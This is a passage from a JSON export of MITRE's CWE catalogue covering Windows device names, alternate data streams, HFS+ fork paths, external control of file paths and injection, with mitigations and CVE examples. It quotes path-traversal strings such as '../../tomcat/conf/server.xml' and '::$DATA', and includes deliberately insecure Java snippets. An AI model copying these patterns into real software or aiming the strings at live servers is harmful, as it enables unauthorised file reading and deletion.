name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0558"},{"Reference":"CVE-2000-0168","Description":"Microsoft Windows 9x operating systems allow an attacker to cause a denial of service via a pathname that includes file device names, aka the \\"DOS Device in Path Name\\" vulnerability.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0168"},{"Reference":"CVE-2001-0492","Description":"Server allows remote attackers to determine the physical path of the server via a URL containing MS-DOS device names.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0492"},{"Reference":"CVE-2004-0552","Description":"Product does not properly handle files whose names contain reserved MS-DOS device names, which can allow malicious code to bypass detection when it is installed, copied, or executed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0552"},{"Reference":"CVE-2005-2195","Description":"Server allows remote attackers to cause a denial of service (application crash) via a URL with a filename containing a .cgi extension and an MS-DOS device name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2195"}]},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Windows MS-DOS device names"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO32-C","Entry_Name":"Do not perform operations on devices that are only appropriate for files","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO00-J","Entry_Name":"Do not operate on files in shared directories"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, "Device Files", Page 666"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Background_Details, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Windows MS-DOS Device Names","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Windows Device Names","attr":{"@_Date":"2009-03-10"}}]}},"69":{"attr":{"@_ID":"69","@_Name":"Improper Handling of Windows ::DATA Alternate Data Stream","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly prevent access to, or detect usage of, alternate data streams (ADS).","Extended_Description":"An attacker can use an ADS to hide information about a file (e.g. size, the name of the process) from a system or file browser tools such as Windows Explorer and \'dir\' at the command line utility. Alternately, the attacker might be able to bypass intended access restrictions for the associated data fork.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"66","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Alternate data streams (ADS) were first implemented in the Windows NT operating system to provide compatibility between NTFS and the Macintosh Hierarchical File System (HFS). In HFS, data and resource forks are used to store information about a file. The data fork provides information about the contents of the file while the resource fork stores metadata such as file type."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Non-Repudiation","Other"],"Impact":["Bypass Protection Mechanism","Hide Activities","Other"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Testing","Description":"Software tools are capable of finding ADSs on your system."},{"Phase":"Implementation","Description":"Ensure that the source code correctly parses the filename to read or write to the correct stream."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0278","Description":"In IIS, remote attackers can obtain source code for ASP files by appending \\"::$DATA\\" to the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0278"},{"Reference":"CVE-2000-0927","Description":"Product does not properly record file sizes if they are stored in alternative data streams, which allows users to bypass quota restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0927"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Windows ::DATA alternate data stream"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"168"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-562"}},{"attr":{"@_External_Reference_ID":"REF-7"}}]},"Notes":{"Note":{"#text":"This and similar problems exist because the same resource can have multiple identifiers that dictate which behavior can be performed on the resource.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Background_Details, Description, Relationships, Other_Notes, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Windows ::DATA Alternate Data Stream","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Windows ::DATA Alternate Data Stream","attr":{"@_Date":"2010-12-13"}}]}},"71":{"attr":{"@_ID":"71","@_Name":"DEPRECATED: Apple \'.DS_Store\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated as it represents a specific observed example of a UNIX Hard Link weakness type rather than its own individual weakness type. Please refer to CWE-62.","Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Maintenance_Notes, Name, Observed_Examples, Relationships, Research_Gaps, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Taxonomy_Mappings"}],"Previous_Entry_Name":{"#text":"Apple \'.DS_Store\'","attr":{"@_Date":"2017-11-08"}}}},"72":{"attr":{"@_ID":"72","@_Name":"Improper Handling of Apple HFS+ Alternate Data Stream Path","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly handle special paths that may identify the data or resource fork of a file on the HFS+ file system.","Extended_Description":"If the software chooses actions to take based on the file name, then if an attacker provides the data or resource fork, the software may take unexpected actions. Further, if the software intends to restrict access to a file, then an attacker might still be able to bypass intended access restrictions by requesting the data or resource fork for that file.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"66","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"macOS","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":{"xhtml:p":["The Apple HFS+ file system permits files to have multiple data input streams, accessible through special paths. The Mac OS X operating system provides a way to access the different data input streams through special paths and as an extended attribute:","Additionally, on filesystems that lack native support for multiple streams, the resource fork and file metadata may be stored in a file with \\"._\\" prepended to the name.","Forks can also be accessed through non-portable APIs.","Forks inherit the file system access controls of the file they belong to.","Programs need to control access to these paths, if the processing of a file system object is dependent on the structure of its path."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["- Resource fork: file/..namedfork/rsrc, file/rsrc (deprecated), xattr:com.apple.ResourceFork","- Data fork: file/..namedfork/data (only versions prior to Mac OS X v10.5)"]}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A web server that interprets FILE.cgi as processing instructions could disclose the source code for FILE.cgi by requesting FILE.cgi/..namedfork/data. This might occur because the web server invokes the default handler which may return the contents of the file."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-1084","Description":"Server allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1084"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-578"}}},"Notes":{"Note":[{"#text":"This and similar problems exist because the same resource can have multiple identifiers that dictate which behavior can be performed on the resource.","attr":{"@_Type":"Theoretical"}},{"#text":"Under-studied","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"David Remahl","Modification_Organization":"Apple","Modification_Date":"2008-11-05","Modification_Comment":"clarified description, provided background details, and added demonstrative example"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Applicable_Platforms, Background_Details, Demonstrative_Examples, Description, Name, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Apple HFS+ Alternate Data Stream","attr":{"@_Date":"2008-11-24"}},{"#text":"Failure to Handle Apple HFS+ Alternate Data Stream Path","attr":{"@_Date":"2009-05-27"}}]}},"73":{"attr":{"@_ID":"73","@_Name":"External Control of File Name or Path","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software allows user input to control or influence paths or file names that are used in filesystem operations.","Extended_Description":{"xhtml:p":["This could allow an attacker to access or modify system files or other files that are critical to the application.","Path manipulation errors occur when the following two conditions are met:","For example, the program may give the attacker the ability to overwrite the specified file or run with a configuration controlled by the attacker."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["1. An attacker can specify a path used in an operation on the filesystem.","2. By specifying the resource, the attacker gains a capability that would not otherwise be permitted."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"642","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"22","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"41","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"98","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"434","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"59","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":[{"attr":{"@_Class":"Unix","@_Prevalence":"Often"}},{"attr":{"@_Class":"Windows","@_Prevalence":"Often"}},{"attr":{"@_Class":"macOS","@_Prevalence":"Often"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality"],"Impact":["Read Files or Directories","Modify Files or Directories"],"Note":"The application can operate on unexpected files. Confidentiality is violated when the targeted filename is not directly readable by the attacker."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Files or Directories","Execute Unauthorized Code or Commands"],"Note":"The application can operate on unexpected files. This may violate integrity if the filename is written to, or if the filename is for a program or other form of executable code."},{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (Other)"],"Note":"The application can operate on unexpected files. Availability can be violated if the attacker specifies an unexpected file that the application modifies. Availability can also be affected if the attacker specifies a filename for a large file, or points to a special device or a file that does not have the format that the application expects."}]},"Detection_Methods":{"Detection_Method":{"Method":"Automated Static Analysis","Description":{"xhtml:p":["The external control or influence of filenames can often be detected using automated static analysis that models data flow within the software.","Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes."]}}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"When the set of filenames is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames, and reject all other inputs. For example, ID 1 could map to \\"inbox.txt\\" and ID 2 could map to \\"profile.txt\\". Features such as the ESAPI AccessReferenceMap provide this capability."},{"Phase":["Architecture and Design","Operation"],"Description":{"xhtml:p":["Run your code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict all access to files within a particular directory.","Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]}},{"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"Phase":"Implementation","Description":"Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes \\"..\\" sequences and symbolic links (CWE-23, CWE-59)."},{"Phase":["Installation","Operation"],"Description":"Use OS-level permissions and run as a low-privileged user to limit the scope of any successful attack."},{"Phase":["Operation","Implementation"],"Description":"If you are using PHP, configure your application so that it does not use register_globals. During implementation, develop your application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"Phase":"Testing","Description":"Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"Phase":"Testing","Description":"Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-65"},"Intro_Text":"The following code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as \\"../../tomcat/conf/server.xml\\", which causes the application to delete one of its own configuration files (CWE-22).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String rName = request.getParameter(\\"reportName\\");File rFile = new File(\\"/usr/local/apfr/reports/\\" + rName);...rFile.delete();","xhtml:br":["","",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-66"},"Intro_Text":"The following code uses input from a configuration file to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can change the configuration file, they can use the program to read any file on the system that ends with the extension .txt.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"fis = new FileInputStream(cfg.getProperty(\\"sub\\")+\\".txt\\");amt = fis.read(arr);out.println(arr);","xhtml:br":["",""]}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-5748","Description":"Chain: external control of values for user\'s desired language and theme enables path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5748"},{"Reference":"CVE-2008-5764","Description":"Chain: external control of user\'s target language enables remote file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5764"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Path Manipulation"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"72"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"80"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-45"}}]},"Notes":{"Note":[{"#text":"CWE-114 is a Class, but it is listed a child of CWE-73 in view 1000. This suggests some abstraction problems that should be resolved in future versions.","attr":{"@_Type":"Maintenance"}},{"attr":{"@_Type":"Relationship"},"xhtml:p":["The external control of filenames can be the primary link in chains with other file-related weaknesses, as seen in the CanPrecede relationships. This is because software systems use files for many different purposes: to execute programs, load code libraries, to store application data, to store configuration settings, record temporary data, act as signals or semaphores to other processes, etc.","However, those weaknesses do not always require external control. For example, link-following weaknesses (CWE-59) often involve pathnames that are not controllable by the attacker at all.","The external control can be resultant from other issues. For example, in PHP applications, the register_globals setting can allow an attacker to modify variables that the programmer thought were immutable, enabling file inclusion (CWE-98) and path traversal (CWE-22). Operating with excessive privileges (CWE-250) might allow an attacker to specify an input filename that is not directly readable by the attacker, but is accessible to the privileged program. A buffer overflow (CWE-119) might give an attacker control over nearby memory locations that are related to pathnames, but were not directly modifiable by the attacker."]}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Common_Consequences, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Manipulation","attr":{"@_Date":"2008-04-11"}}}},"74":{"attr":{"@_ID":"74","@_Name":"Improper Neutralization of Special Elements in Output Used by a Downstream Component (\'Injection\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.","Extended_Description":"Software has certain assumptions about what constitutes data and control respectively. It is the lack of verification of these assumptions for user-controlled input that leads to injection problems. Injection problems encompass a wide variety of issues -- all mitigated in very different ways and usually attempted in order to alter the control flow of the process. For this reason, the most effective way to discuss these weaknesses is to note the distinct features which classify them as injection weaknesses. The most important issue to note is that all injection problems share one thing in common -- i.e., they allow for the injection of control plane data into the user-controlled data plane. This means that the execution of the process may be altered by sending code in through legitimate data channels, using no other mechanism. While buffer overflows, and many other flaws, involve the use of some further issue to gain execution, injection problems need only for the data to be parsed. The most classic instantiations of this category of weakness are SQL injection and format string 